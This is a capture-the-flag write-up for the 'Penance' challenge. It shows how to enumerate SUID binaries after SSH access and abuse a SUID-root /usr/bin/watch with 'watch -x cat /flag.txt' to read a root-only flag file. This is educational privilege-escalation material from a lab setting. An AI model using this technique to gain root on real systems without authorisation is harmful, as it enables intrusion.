MARTINA Challenge #2 - Penance
This challenge can be found when Martina makes a run for it.
The Setup
Help Martina break into Penance's servers!
Try to gain root level access to the system and read the /flag.txt file.
You are also given a command you can use to gain user access to a remote server using ssh.
The Privilege Escalation
Once we SSH into the server as a regular user, we need to find a way to escalate our privileges to root and read /flag.txt.
The first thing to check is SUID binaries - programs that run with the permissions of their owner (often root) regardless of who executes them:
$ find / -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/watch
/usr/bin/mount
/usr/bin/su
/usr/bin/passwd
Most of these are standard system binaries, but /usr/bin/watch stands out as potentially exploitable. The watch command normally runs other commands repeatedly, but with the -x flag it can execute commands directly.
Since watch has the SUID bit set and is owned by root, we can use it to read files with root privileges:
$ watch -x cat /flag.txt
This executes cat /flag.txt with root permissions, giving us the flag!